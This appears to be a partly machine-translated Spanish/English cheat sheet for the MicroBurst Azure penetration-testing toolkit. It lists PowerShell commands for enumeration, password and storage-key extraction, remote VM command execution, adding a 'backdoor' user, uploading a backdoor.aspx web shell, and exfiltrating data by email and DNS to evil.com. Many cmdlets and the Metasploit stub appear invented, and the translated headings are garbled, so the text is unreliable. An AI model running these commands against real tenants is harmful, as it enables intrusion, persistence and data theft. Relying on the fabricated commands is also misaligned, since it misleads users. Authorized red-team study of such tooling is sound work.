MicroBurst Azure Security Testing Toolkit Cheat Sheet
"Clase de la hoja" idbutton id="microburst-copy-btn" class="copy-btn" onclick="copyAllCommands()" Copiar todos los comandos id="microburst-pdf-btn" class="pdf-btn" onclick="generatePDF()" Generar PDF seleccionado/button ■/div titulada
Sinopsis
MicroBurst es una colección de scripts PowerShell desarrollados por NetSPI para evaluar la seguridad de Microsoft Azure. Incluye herramientas para el descubrimiento de servicios de Azure, escalada de privilegios, movimiento lateral y exfiltración de datos, lo que lo convierte en un completo kit de herramientas para las pruebas de penetración de Azure.
NOVEDAD Advertencia: Esta herramienta está destinada únicamente a pruebas de penetración autorizadas y evaluaciones de seguridad. Asegúrese de tener la autorización adecuada antes de usar en cualquier entorno.
Instalación
Instalación de PowerShell Gallery
# Install from PowerShell Gallery
Install-Module -Name MicroBurst
# Install for current user only
Install-Module -Name MicroBurst -Scope CurrentUser
# Update existing installation
Update-Module -Name MicroBurst
# Import module
Import-Module MicroBurst
Instalación manual
# Download from GitHub
Invoke-WebRequest -Uri "https://github.com/NetSPI/MicroBurst/archive/master.zip" -OutFile "MicroBurst.zip"
Expand-Archive -Path "MicroBurst.zip" -DestinationPath "C:\Tools\"
# Import module
Import-Module C:\Tools\MicroBurst-master\MicroBurst.psd1
# Install dependencies
Install-Module -Name Az
Install-Module -Name AzureAD
Git Instalación
# Clone repository
git clone https://github.com/NetSPI/MicroBurst.git
cd MicroBurst
# Import in PowerShell
Import-Module .\MicroBurst.psd1
Uso básico
Instalación
# Import MicroBurst
Import-Module MicroBurst
# Get available commands
Get-Command -Module MicroBurst
# Get help for specific function
Get-Help Invoke-EnumerateAzureBlobs -Full
# Check module version
Get-Module MicroBurst
Autenticación
# Interactive authentication
Connect-AzAccount
# Service principal authentication
$credential = Get-Credential
Connect-AzAccount -ServicePrincipal -Credential $credential -TenantId "tenant-id"
# Certificate authentication
Connect-AzAccount -ServicePrincipal -CertificateThumbprint "thumbprint" -ApplicationId "app-id" -TenantId "tenant-id"
Referencia del Comando
Funciones de reconocimiento
| Function | Description |
|---|---|
Invoke-EnumerateAzureBlobs |
Enumerate Azure storage blobs |
Invoke-EnumerateAzureSubDomains |
Enumerate Azure subdomains |
Get-AzurePasswords |
Extract passwords from Azure resources |
Get-AzureDomainInfo |
Get domain information |
Invoke-AzureRmVmBulkCMD |
Execute commands on multiple VMs |
Funciones de la cuenta de almacenamiento
| Function | Description |
|---|---|
Invoke-EnumerateAzureBlobs |
Find accessible storage blobs |
Get-AzureBlobFiles |
Download files from storage |
Invoke-AzureStorageAccountEnum |
Enumerate storage accounts |
Get-AzureStorageAccountKeys |
Extract storage account keys |
Funciones de la máquina virtual
| Function | Description |
|---|---|
Invoke-AzureRmVmBulkCMD |
Bulk command execution |
Get-AzureVMDisk |
Access VM disk information |
Invoke-AzureVMUserDataEnum |
Enumerate VM user data |
Get-AzureVMExtensionSettings |
Get VM extension settings |
Azure Storage Enumeration
Blob Storage Discovery
# Basic blob enumeration
Invoke-EnumerateAzureBlobs -Base "company"
# Enumerate with custom wordlist
Invoke-EnumerateAzureBlobs -Base "company" -Wordlist "custom-wordlist.txt"
# Enumerate specific containers
Invoke-EnumerateAzureBlobs -Base "company" -Containers @("backup", "logs", "data")
# Enumerate with threading
Invoke-EnumerateAzureBlobs -Base "company" -Threads 10
Suministro de la cuenta de almacenamiento
# Enumerate storage accounts
Invoke-AzureStorageAccountEnum -SubscriptionId "subscription-id"
# Get storage account keys
Get-AzureStorageAccountKeys -StorageAccountName "storageaccount"
# Enumerate storage containers
Get-AzureStorageContainers -StorageAccountName "storageaccount"
# Download files from storage
Get-AzureBlobFiles -StorageAccountName "storageaccount" -ContainerName "container" -OutputPath "C:\Downloads\"
Contenido compartido
# Enumerate file shares
Get-AzureFileShares -StorageAccountName "storageaccount"
# Access file share contents
Get-AzureFileShareContents -StorageAccountName "storageaccount" -ShareName "share"
# Download files from file share
Get-AzureFileShareFiles -StorageAccountName "storageaccount" -ShareName "share" -OutputPath "C:\Downloads\"
Subdominio y servicio Discovery
Azure Subdomain Enumeration
# Basic subdomain enumeration
Invoke-EnumerateAzureSubDomains -Base "company"
# Enumerate with custom services
Invoke-EnumerateAzureSubDomains -Base "company" -Services @("azurewebsites", "blob", "queue", "table")
# Enumerate with permutations
Invoke-EnumerateAzureSubDomains -Base "company" -Permutations @("dev", "test", "prod", "staging")
# Save results to file
Invoke-EnumerateAzureSubDomains -Base "company" -OutputFile "subdomains.txt"
Service Discovery
# Discover Azure services
Get-AzureServices -Domain "company.com"
# Enumerate web applications
Get-AzureWebApps -SubscriptionId "subscription-id"
# Discover SQL databases
Get-AzureSQLDatabases -SubscriptionId "subscription-id"
# Find Key Vaults
Get-AzureKeyVaults -SubscriptionId "subscription-id"
DNS Enumeration
# Enumerate DNS records
Get-AzureDNSRecords -Domain "company.com"
# Check for zone transfers
Test-AzureDNSZoneTransfer -Domain "company.com"
# Enumerate subdomains via DNS
Get-AzureSubdomainsDNS -Domain "company.com" -Wordlist "subdomains.txt"
Explotación de la máquina virtual
VM Command Execution
# Execute command on single VM
Invoke-AzureRmVmBulkCMD -VMName "vm-name" -ResourceGroupName "rg-name" -Command "whoami"
# Execute commands on multiple VMs
$vms = @("vm1", "vm2", "vm3")
Invoke-AzureRmVmBulkCMD -VMNames $vms -ResourceGroupName "rg-name" -Command "systeminfo"
# Execute PowerShell script on VMs
Invoke-AzureRmVmBulkCMD -VMName "vm-name" -ResourceGroupName "rg-name" -ScriptPath "C:\Scripts\enum.ps1"
VM Disk Access
# Get VM disk information
Get-AzureVMDisk -VMName "vm-name" -ResourceGroupName "rg-name"
# Create disk snapshot
New-AzureVMDiskSnapshot -VMName "vm-name" -ResourceGroupName "rg-name"
# Mount disk snapshot
Mount-AzureVMDiskSnapshot -SnapshotName "snapshot-name" -MountPoint "E:\"
# Extract data from mounted disk
Get-AzureVMDiskData -MountPoint "E:\" -OutputPath "C:\Extracted\"
VM Extension Exploitation
# Get VM extension settings
Get-AzureVMExtensionSettings -VMName "vm-name" -ResourceGroupName "rg-name"
# Install custom extension
Install-AzureVMCustomExtension -VMName "vm-name" -ResourceGroupName "rg-name" -ScriptPath "backdoor.ps1"
# Execute via extension
Invoke-AzureVMExtensionCommand -VMName "vm-name" -ResourceGroupName "rg-name" -Command "net user backdoor Password123 /add"
Extracción Credencial y Secreta
Extracción de contraseña
# Extract passwords from Azure resources
Get-AzurePasswords -SubscriptionId "subscription-id"
# Extract passwords from specific resource types
Get-AzurePasswords -ResourceTypes @("VirtualMachines", "WebApps", "Databases")
# Extract passwords from Key Vaults
Get-AzureKeyVaultPasswords -KeyVaultName "keyvault-name"
# Extract connection strings
Get-AzureConnectionStrings -SubscriptionId "subscription-id"
Extracción de certificado
# Extract certificates from Key Vault
Get-AzureKeyVaultCertificates -KeyVaultName "keyvault-name"
# Extract certificates from web apps
Get-AzureWebAppCertificates -WebAppName "webapp-name"
# Export certificates
Export-AzureCertificates -OutputPath "C:\Certificates\"
Configuración Extracción de datos
# Extract application settings
Get-AzureAppSettings -WebAppName "webapp-name"
# Extract environment variables
Get-AzureEnvironmentVariables -ResourceGroupName "rg-name"
# Extract deployment credentials
Get-AzureDeploymentCredentials -WebAppName "webapp-name"
Explotación de bases de datos
SQL Database Enumeration
# Enumerate SQL databases
Get-AzureSQLDatabases -SubscriptionId "subscription-id"
# Get SQL server information
Get-AzureSQLServerInfo -ServerName "sqlserver-name"
# Check SQL firewall rules
Get-AzureSQLFirewallRules -ServerName "sqlserver-name"
# Test SQL connectivity
Test-AzureSQLConnectivity -ServerName "sqlserver-name" -DatabaseName "database-name"
SQL Database Access
# Connect to SQL database
Connect-AzureSQLDatabase -ServerName "sqlserver-name" -DatabaseName "database-name" -Credential $cred
# Execute SQL queries
Invoke-AzureSQLQuery -ServerName "sqlserver-name" -DatabaseName "database-name" -Query "SELECT * FROM users"
# Extract database schema
Get-AzureSQLSchema -ServerName "sqlserver-name" -DatabaseName "database-name"
# Dump database data
Export-AzureSQLData -ServerName "sqlserver-name" -DatabaseName "database-name" -OutputPath "C:\SQLDump\"
CosmosDB Explotación
# Enumerate CosmosDB accounts
Get-AzureCosmosDBAccounts -SubscriptionId "subscription-id"
# Get CosmosDB keys
Get-AzureCosmosDBKeys -AccountName "cosmosdb-account"
# Access CosmosDB data
Get-AzureCosmosDBData -AccountName "cosmosdb-account" -DatabaseName "database" -ContainerName "container"
Explotación de aplicaciones web
Web App Enumeration
# Enumerate web applications
Get-AzureWebApps -SubscriptionId "subscription-id"
# Get web app configuration
Get-AzureWebAppConfig -WebAppName "webapp-name"
# Check web app authentication
Get-AzureWebAppAuth -WebAppName "webapp-name"
# Get web app deployment slots
Get-AzureWebAppSlots -WebAppName "webapp-name"
Explotación de la aplicación web
# Access web app files via Kudu
Get-AzureWebAppFiles -WebAppName "webapp-name" -Path "/site/wwwroot/"
# Execute commands via Kudu
Invoke-AzureWebAppCommand -WebAppName "webapp-name" -Command "dir"
# Upload backdoor file
Upload-AzureWebAppFile -WebAppName "webapp-name" -LocalPath "backdoor.aspx" -RemotePath "/site/wwwroot/"
# Access web app logs
Get-AzureWebAppLogs -WebAppName "webapp-name"
Función de la explotación de la aplicación
# Enumerate function apps
Get-AzureFunctionApps -SubscriptionId "subscription-id"
# Get function app keys
Get-AzureFunctionAppKeys -FunctionAppName "functionapp-name"
# Execute function
Invoke-AzureFunction -FunctionAppName "functionapp-name" -FunctionName "function-name" -Payload $payload
# Access function app files
Get-AzureFunctionAppFiles -FunctionAppName "functionapp-name"
Escalada de Privilege
Función de asignación
# Get current user roles
Get-AzureCurrentUserRoles
# Enumerate role assignments
Get-AzureRoleAssignments -SubscriptionId "subscription-id"
# Find privilege escalation paths
Find-AzurePrivEscPaths -SubscriptionId "subscription-id"
# Check for dangerous permissions
Get-AzureDangerousPermissions -SubscriptionId "subscription-id"
Service Principal Abuso
# Enumerate service principals
Get-AzureServicePrincipals -SubscriptionId "subscription-id"
# Get service principal credentials
Get-AzureServicePrincipalCredentials -ServicePrincipalId "sp-id"
# Abuse service principal permissions
Invoke-AzureServicePrincipalAbuse -ServicePrincipalId "sp-id" -Action "CreateUser"
Explotación de identidad administrada
# Check for managed identity
Test-AzureManagedIdentity
# Get managed identity token
Get-AzureManagedIdentityToken -Resource "https://management.azure.com/"
# Use managed identity for privilege escalation
Invoke-AzureManagedIdentityPrivEsc -TargetResource "subscription"
Movimiento Lateral
Suscripción cruzada Acceso
# Enumerate accessible subscriptions
Get-AzureAccessibleSubscriptions
# Switch subscription context
Set-AzureSubscriptionContext -SubscriptionId "target-subscription-id"
# Enumerate resources in target subscription
Get-AzureResourcesInSubscription -SubscriptionId "target-subscription-id"
Acceso entre inquilinos
# Enumerate accessible tenants
Get-AzureAccessibleTenants
# Switch tenant context
Set-AzureTenantContext -TenantId "target-tenant-id"
# Enumerate resources in target tenant
Get-AzureResourcesInTenant -TenantId "target-tenant-id"
Grupo de recursos
# Enumerate resource groups
Get-AzureResourceGroups -SubscriptionId "subscription-id"
# Find resources with weak permissions
Find-AzureWeakPermissions -ResourceGroupName "rg-name"
# Pivot through resource groups
Invoke-AzureResourceGroupPivot -SourceRG "source-rg" -TargetRG "target-rg"
Exfiltración de datos
Extracción de datos a granel
# Extract all accessible data
Invoke-AzureBulkDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\"
# Extract specific data types
Invoke-AzureDataExtraction -DataTypes @("Secrets", "Certificates", "Databases") -OutputPath "C:\Exfiltrated\"
# Extract with compression
Invoke-AzureDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\" -Compress
Exfiltración de Stealth
# Exfiltrate via storage account
Invoke-AzureStealthExfiltration -Method "StorageAccount" -TargetStorage "exfil-storage"
# Exfiltrate via email
Invoke-AzureStealthExfiltration -Method "Email" -EmailAddress "attacker@evil.com"
# Exfiltrate via DNS
Invoke-AzureStealthExfiltration -Method "DNS" -DNSServer "evil.com"
Automatización y scripting
Script de evaluación automatizada
# Comprehensive Azure assessment
param(
[string]$SubscriptionId,
[string]$OutputPath = "C:\AzureAssessment"
)
# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force
# Authenticate
Connect-AzAccount
# Set subscription context
Set-AzContext -SubscriptionId $SubscriptionId
# Enumerate subdomains
Write-Host "Enumerating subdomains..."
$subdomains = Invoke-EnumerateAzureSubDomains -Base (Get-AzContext).Subscription.Name
$subdomains|Out-File "$OutputPath\subdomains.txt"
# Enumerate storage blobs
Write-Host "Enumerating storage blobs..."
$blobs = Invoke-EnumerateAzureBlobs -Base (Get-AzContext).Subscription.Name
$blobs|Out-File "$OutputPath\blobs.txt"
# Extract passwords
Write-Host "Extracting passwords..."
$passwords = Get-AzurePasswords -SubscriptionId $SubscriptionId
$passwords|Export-Csv "$OutputPath\passwords.csv" -NoTypeInformation
# Get VM information
Write-Host "Gathering VM information..."
$vms = Get-AzVM
$vms|Export-Csv "$OutputPath\vms.csv" -NoTypeInformation
# Generate summary report
$summary = @\\\\{
AssessmentDate = Get-Date
SubscriptionId = $SubscriptionId
SubdomainsFound = $subdomains.Count
BlobsFound = $blobs.Count
PasswordsFound = $passwords.Count
VMsFound = $vms.Count
\\\\}
$summary|ConvertTo-Json|Out-File "$OutputPath\summary.json"
Write-Host "Assessment completed. Results saved to $OutputPath"
Supervisión continua
# Continuous Azure monitoring
param(
[int]$IntervalMinutes = 60,
[string]$LogPath = "C:\AzureMonitoring\monitor.log"
)
while ($true) \\\\{
$timestamp = Get-Date
Write-Output "[$timestamp] Starting Azure monitoring cycle"|Tee-Object -FilePath $LogPath -Append
try \\\\{
# Check for new storage accounts
$newStorage = Get-AzStorageAccount|Where-Object \\\\{$_.CreationTime -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newStorage) \\\\{
Write-Output "[$timestamp] New storage accounts detected: $($newStorage.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
# Check for new VMs
$newVMs = Get-AzVM|Where-Object \\\\{$_.TimeCreated -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newVMs) \\\\{
Write-Output "[$timestamp] New VMs detected: $($newVMs.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
# Check for new role assignments
$newRoles = Get-AzRoleAssignment|Where-Object \\\\{$_.CreatedOn -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newRoles) \\\\{
Write-Output "[$timestamp] New role assignments detected: $($newRoles.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
\\\\}
catch \\\\{
Write-Output "[$timestamp] Error during monitoring: $($_.Exception.Message)"|Tee-Object -FilePath $LogPath -Append
\\\\}
Start-Sleep -Seconds ($IntervalMinutes * 60)
\\\\}
Solución de problemas
Cuestiones de autenticación
# Clear cached credentials
Clear-AzContext -Force
# Test authentication
$context = Get-AzContext
if (-not $context) \\\\{
Write-Error "Not authenticated to Azure"
Connect-AzAccount
\\\\}
# Verify subscription access
Get-AzSubscription
Cuestiones de módulo
# Check MicroBurst installation
Get-Module MicroBurst -ListAvailable
# Update MicroBurst
Update-Module MicroBurst -Force
# Check dependencies
Get-Module Az -ListAvailable
Cuestiones de admisión
# Check current permissions
$roleAssignments = Get-AzRoleAssignment -SignInName (Get-AzContext).Account.Id
$roleAssignments|Select-Object RoleDefinitionName, Scope
# Test specific permissions
try \\\\{
Get-AzStorageAccount -ErrorAction Stop
Write-Output "Storage account read permission: OK"
\\\\}
catch \\\\{
Write-Output "Storage account read permission: DENIED"
\\\\}
Integración con otras herramientas
Integración de la sangre
# Export data for BloodHound
$azureData = @\\\\{
users = Get-AzADUser
groups = Get-AzADGroup
servicePrincipals = Get-AzADServicePrincipal
roleAssignments = Get-AzRoleAssignment
\\\\}
# Convert to BloodHound format
$bloodhoundData = Convert-AzureToBloodHound -Data $azureData
$bloodhoundData|ConvertTo-Json -Depth 3|Out-File "azure_bloodhound.json"
Integración Metasploit
# Metasploit module for MicroBurst
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = \\\\{\\\\})
super(update_info(info,
'Name' => 'Azure MicroBurst Integration',
'Description' => 'Execute MicroBurst functions via Metasploit',
'Author' => ['NetSPI'],
'License' => MSF_LICENSE
))
register_options([
OptString.new('SUBSCRIPTION_ID', [true, 'Azure Subscription ID']),
OptString.new('FUNCTION', [true, 'MicroBurst function to execute'])
])
end
def run
subscription_id = datastore['SUBSCRIPTION_ID']
function = datastore['FUNCTION']
# Execute MicroBurst function
powershell_cmd = "Import-Module MicroBurst; #\\\\{function\\\\} -SubscriptionId #\\\\{subscription_id\\\\}"
print_status("Executing: #\\\\{powershell_cmd\\\\}")
# Execute PowerShell command
end
end
Recursos
- MicroBurst GitHub Repository
- NetSPI Blog
- Azure Security Documentation
- Azure Penetration Testing
- Azure Red Team Tactics
-...
*Esta hoja de trampa proporciona una referencia completa para el uso de MicroBurst. Siempre asegúrese de tener una autorización adecuada antes de realizar evaluaciones de seguridad de Azure. *